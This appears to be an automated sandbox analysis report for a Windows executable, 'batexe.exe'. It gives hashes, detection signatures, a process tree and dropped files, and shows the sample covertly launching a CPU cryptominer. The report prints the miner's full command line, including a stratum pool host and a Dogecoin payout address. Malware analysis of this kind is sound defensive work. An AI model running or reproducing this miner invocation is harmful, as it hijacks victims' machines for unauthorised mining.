73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
294s
max time network
293s
platform
windows10-2004_x64
resource
win10v2004-20231222-ja
resource tags

arch:x64arch:x86image:win10v2004-20231222-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 13:16

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3803511929-1339359695-2191195476-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
3020	b2e.exe
680	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
680	cpuminer-sse2.exe
680	cpuminer-sse2.exe
680	cpuminer-sse2.exe
680	cpuminer-sse2.exe
680	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/800-8-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 800 wrote to memory of 3020	800	batexe.exe	85
PID 800 wrote to memory of 3020	800	batexe.exe	85
PID 800 wrote to memory of 3020	800	batexe.exe	85
PID 3020 wrote to memory of 4464	3020	b2e.exe	86
PID 3020 wrote to memory of 4464	3020	b2e.exe	86
PID 3020 wrote to memory of 4464	3020	b2e.exe	86
PID 4464 wrote to memory of 680	4464	cmd.exe	89
PID 4464 wrote to memory of 680	4464	cmd.exe	89

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:800
- C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\BAA5.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4464
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:680

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe

Filesize
7.1MB

MD5
e61c6850744de6d18aeb0a5ff4efdaa5

SHA1
e457f7b486dc254de4d1c8926f949e4eed7b5e57

SHA256
8bb8e2aefc5697e067ee9a919a8441a16cd0db7c7ab9e5d5637918a8095b16f5

SHA512
872058393e024f8ea9e7e6e1e48b9fc5b2f32f5d916dd71897e40c1791063d0cfd68d66e06dfd3af8a948a5969fdd44c162868289dd3f4019afa412af3fb5337

Download Submit
C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe

Filesize
2.5MB

MD5
d6d1fe2fb3d4d6ef2bf6d236df3d5cbd

SHA1
07976e6eba0c00fc297480ae5dab24475630c450

SHA256
4e3c4ce0f5609ddf980375ea238c61ce75a026a48cfe423ed8ad8e40214ebc2d

SHA512
ddf30e1475f39feacf034f6945deb1a472dc2eb370a5f913470712255114fe961057b19aadaf23c4ff7dc4f83d24bc9bacc9927614afb6e5bf63b0ed3f58e991

Download Submit
C:\Users\Admin\AppData\Local\Temp\B7A7.tmp\b2e.exe

Filesize
2.4MB

MD5
9ac5f7943487d5ce64cbdf89765f9ba0

SHA1
d9ab65e7b608bee7c04dd2631fd93b65b62ab96b

SHA256
c32e47b40ec0a4681aadd015e7415533cc5e2886a6f3cadf9411e2188364588f

SHA512
9da3489ad5e7a0017208bfd3ab9e0e0e97522a2b0b54ed62872ab9a20cc066e066e840756feb3588ff1007d73bb447c4ef4666aa31798bd38ba96157f85de839

Download Submit
C:\Users\Admin\AppData\Local\Temp\BAA5.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
209KB

MD5
18751ab133b6c1b0091b98c90ca675b4

SHA1
4acfb40f2ce2c9711e9fce01d2e549989939ba5c

SHA256
794db039fdbee9bce74927075df34924370c94d742378860cea4a9f9cffe843b

SHA512
ff8434b3c144c473c279acd5ec2bbc8eca7930f78bc16550ac399dd0fa657fab9883d93e00268ea9fa8190d972d2dcbd76b837f17c1938c5f12ffe61d37fad56

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
173KB

MD5
3724209ec07fe8c7c255b02fdf49ce8c

SHA1
9b156f764bc7356aff6e2ded0d586c3939374d26

SHA256
5c7b9472d74c1a46cb9b817fea8f32ef91eb042e151806baf0d92f2521dc7173

SHA512
72f2bcbba69f3d34f1d4fc0f094df4c4490846836cd7eb64db7587af51e19bfc90fb8e3a720fe1826e4de6c212b4e32a3c3a5bec234951e950953eac25b02ba1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
222KB

MD5
27cd25678b6cda3f054e402bcd6c1287

SHA1
6c5980a9319bdcd0f34113409b45b0d9e7a8c929

SHA256
aaffcaba4e052e933b45b78c38659031a748a5fab23c6bad6c90ab1e641d51ed

SHA512
3ca8f576ba6618401b79e293298377ad1d0f46ea7991040c5efedee2358bc63b68cf9465bb3f053e70811620737886b9c385d4c40b4dbaa5966759c324a1d046

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
343KB

MD5
b96ee10d8d4f2f803747214bcf4f6f93

SHA1
b00ee022e76023f39a2d64fa1b32ec44e3121f8d

SHA256
cb94adc9361aa55a7a0c8dad8be02221519c985435210c8fcf6d86247d5192b6

SHA512
23bdab6bb8f2236061c262a82df921a1834526cff311c7fb62ebabfd136482e2660805c7ede5a1744dd8e963bca86021e237c794723d85d527e199a9cc0d2217

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
109KB

MD5
2c4ad6557d43b8464c3fd15c9631f42a

SHA1
c14482d6b51d596d7b74888dc55e13a9d21b2632

SHA256
7e107c9cdf9433283f0c60858c13d179569551f08a601ec3b5630a6d5ce1f4e4

SHA512
3205f95032b6f251cb07a58dc0c870457aa564e81352e0c2a981645d2c2fcaff7aa7a2e09eb27092ceb69868769f0a184dcadaaf7adbe75b7bd8210cd3173a38

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
57KB

MD5
9847e73bcb93a91acd165a0f6892b3f6

SHA1
1015d74d21104498e7155841b9e7cd8f66a983c5

SHA256
e324d252f54abb2a57eb723ff7e77015f545af2544a54b9bcacfe2a20ec4abe4

SHA512
f2047bd1599c42d543bd698bd0e6f1df718648169ec08c9a47403b69c5d88a2cdeb388138fafdfa38a4ecbd6f0f54e209357967a3987221351bd44860169f88d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
135KB

MD5
aa9eed3fe7d1e3b96c651aa2f5e562d6

SHA1
0bd2c1d16521a1ca4e4ba9fc34d3953afc814988

SHA256
f2c9fccad362de77453f08c717623b9fa8ee83db4aa799a6e01e012488f58e08

SHA512
febb7d91f8c723408a38d21e8462464f3e5a325ef67cf6d3dacb0fe82e6822a7e98ab33f5f20fe61421f8d63fc34b8fc34466722f059c9ddec06f83555497bc9

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
103KB

MD5
73f69007460833a59f13c5aaa74f95d7

SHA1
a05cecd2df5becb81bd2568588568131713866dc

SHA256
8c33729555559f5960e71178967c31fb0acb9f692387ef1fe30057f444727ac7

SHA512
f20b792153967745f11408da40453de6afb92ebab64621db2d16c56a835d8d5f24798179f64e76af67bb1f89ac98e7903886794e88b9b50d91ba639678852a6c

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
57KB

MD5
4a91d8f522a86a4a67e44a7667410a6f

SHA1
7ecf2598d4da2b1b105991b2f5a49c8e14e648a4

SHA256
4ecdc95a5d1aac157a46642018b8ed1f005ee2ab6e9ab2bf8f38e961dc37ea4c

SHA512
aa5a94d3acb4c310f0b24d132556ff07ec17bc152e4575c7e3e3d89babc9768ac0be323f3ed89c796d145b28f19a7d8d880721077b4e503a2aa3b8990032f9e3

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
94KB

MD5
881d662f23aa20e0be0f6a49c50d2c52

SHA1
135140a176d2796b08840562df4a7ca5a86d7ecb

SHA256
768b6cab6be9d2a9743672cf2020430ce74f9e21c6df018a92a9395348e69ed8

SHA512
a5fca49dca37820a2ecd59ecf9e53956643f2a39ac9fa7f1cdb5aec7cbeda7597e7c4b9963b82e9e9be1b5590e37c0a1ab2f32574613558f8266cd63fac26509

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
103KB

MD5
1ef8639989dbea8e247357ad503f03bd

SHA1
46851e1ca638497a24b2d4447bc847320d01de90

SHA256
88bcf920132b620573953361e0a827e81fc6837f378fcbba09d531dac4afca87

SHA512
2a9a9ce4bd4c53c0b3f0103f62b71892797325e74fa9ad9aa24c05f73aca9baacee233b13b55ea753ace5a88f283d471c11e770540527c18dbceab6a2f574a71

Download Submit
memory/680-69-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-59-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-46-0x0000000073A60000-0x0000000073AF8000-memory.dmp

Filesize
608KB

Download
memory/680-45-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/680-44-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/680-47-0x0000000001030000-0x00000000028E5000-memory.dmp

Filesize
24.7MB

Download
memory/680-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-104-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-94-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-54-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-64-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-89-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-74-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/680-84-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/800-8-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/3020-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/3020-9-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download